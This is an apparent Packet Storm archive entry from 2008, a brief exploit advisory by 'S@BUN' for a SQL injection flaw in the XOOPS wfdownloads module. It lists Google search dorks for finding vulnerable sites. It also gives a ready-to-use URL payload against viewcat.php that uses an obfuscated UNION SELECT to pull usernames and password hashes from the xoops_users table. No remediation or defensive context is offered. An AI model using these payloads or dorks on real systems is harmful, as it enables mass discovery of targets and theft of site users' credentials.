xoopswfdownloads-sql.txt

2008-03-12T00:00:00
ID PACKETSTORM:64386
Type packetstorm
Reporter S@BUN
Modified 2008-03-12T00:00:00

Description

                                        
                                            `###############################################################  
#  
###########XOOPS module wfdownloads SQL Injection  
#  
###############################################################  
#  
##AUTHOR : S@BUN  
#  
####HOME : http://www.milw0rm.com/author/1334  
#  
####MAiL : hackturkiye.hackturkiye@gmail.com  
#  
################################################################  
#  
##DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid"  
#  
##DORK 2 : allinurl: "modules/wfdownloads"  
#  
################################################################  
EXPLOIT :  
  
modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass  
  
################################################################  
##S@BUN#############i AM NOT HACKER##########S@BUN#########  
################################################################  
##S@BUN######hackturkiye.hackturkiye@gmail.com####S@BUN#########  
################################################################  
  
`